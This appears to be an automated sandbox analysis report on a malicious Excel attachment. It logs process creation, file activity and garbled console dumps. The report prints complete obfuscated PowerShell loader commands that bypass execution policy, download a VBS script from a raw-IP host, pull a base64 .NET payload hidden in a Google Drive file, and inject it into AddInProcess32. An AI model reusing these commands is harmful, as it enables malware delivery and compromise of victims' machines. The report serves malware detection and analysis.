Source: classification engine Classification label: mal100.expl.evad.winXLS@31/45@7/4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\54330000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR9387.tmp Jump to behavior
Source: A & C Metrology OC 5457144.xls OLE indicator, Workbook stream: true
Source: 54330000.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................P:.............0.................!.......................!.......!......................3........................!............. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................h(..............................}..w.............................1......(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................P:.............................}..w.............................1......(.P..............3...................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................Cm:........................l....}..w............\.......................(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................................}..w..............O.....q..l......O.....(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................Cm:........................l....}..w............\.......................(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................................}..w..............O.....q..l......O.....(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...O.....q..l......O.....(.P............................. ....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .d.E.v.I.c.E.C.R.e.d.E.n.t.i.a.L.d.e.P.l.O.y.m.e.N.t.(.P.............................8....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.............................8....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................................}..w..............O.....q..l......O.....(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...................F....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................................}..w..............O.....q..l......O.....(.P.............................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ ...............}..w..............O.....q..l......O.....(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................P:.............T.r.u.e.........}..w.............................1......(.P..............3......................@.p............. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................h(..............................}..w.............................1......(.P.....X.......t....................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..*.....................................@.p.....}..w............8.......8.......@"......(.P.....X.......t.........*............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................Cm:.......................[k....}..w....@.p.....\.......................(.P.....X.......t.......(............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.8.1.......[k....pXb.....(.P.....X.......t...............$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................Cm:.......................[k....}..w....@.p.....\.......................(.P.....X.......t.......(............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..*.....................................@.p.....}..w............p`R.......[k....pXb.....(.P.....X.......t.........*............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..*.....................................@.p.....}..w............p`R.......[k....pXb.....(.P.....X.......t.........*............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..*.....................................@.p.....}..w............p`R.......[k....pXb.....(.P.....X.......t.........*............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..*.....................................@.p.....}..w............p`R.......[k....pXb.....(.P.....X.......t.........*.....T....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......@.p.....}..w............p`R.......[k....pXb.....(.P.....X.......t....................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................P:.............0........................................................................3......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................h(..............................}..w.............................1......(.P.....X...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................P:.............................}..w.............................1......(.P..............3......................`...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................Cm:........................l....}..w....`.......\.......................(.P.....X...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................`.......}..w............0 e........l......d.....(.P.....X...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................Cm:........................l....}..w....`.......\.......................(.P.....X...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................`.......}..w............0 e........l......d.....(.P.....X...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....H.......N.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0 e........l......d.....(.P.....X...............H....... .......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .d.E.v.I.c.E.C.R.e.d.E.n.t.i.a.L.d.e.P.l.O.y.m.e.N.t.(.P.....X...............H.......8.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....X...............H.......8.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................`.......}..w............0 e........l......d.....(.P.....X...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........H.......F.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................`.......}..w............0 e........l......d.....(.P.....X.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......`.......}..w............0 e........l......d.....(.P.....X...............H...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................P:.............T.r.u.e.........}..w.............................1......(.P..............3......h...............p$..............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................h(..............................}..w.............................1......(.P.............t.......h...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................p$......}..w............8.......8.......@"......(.P.............t.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................Cm:.....................F..l....}..w....p$......\.......................(.P.............t.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................a.n. .e.r.r.o.r.:. .(.4.0.4.). .N.o.t. .F.o.u.n.d..."...(.P.............t...............6.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................Cm:.....................F..l....}..w....p$......\.......................(.P.............t.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.8.1........l....._......(.P.............t...............$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................p$......}..w.............e.........l....._......(.P.............t.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................p$......}..w.............e.........l....._......(.P.............t.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................p$......}..w.............e.........l....._......(.P.............t.......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................p$......}..w.............e.........l....._......(.P.............t...............T.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......p$......}..w.............e.........l....._......(.P.............t.......................................
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: A & C Metrology OC 5457144.xls ReversingLabs: Detection: 18%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES955D.tmp" "c:\Users\user\AppData\Local\Temp\td4qmpaq\CSC7C3FCBBFF452466CBE70AA6FD2E366A.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD71D.tmp" "c:\Users\user\AppData\Local\Temp\mans504x\CSCCEA378A2A3F7449F819B5EAA6DFD95A.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg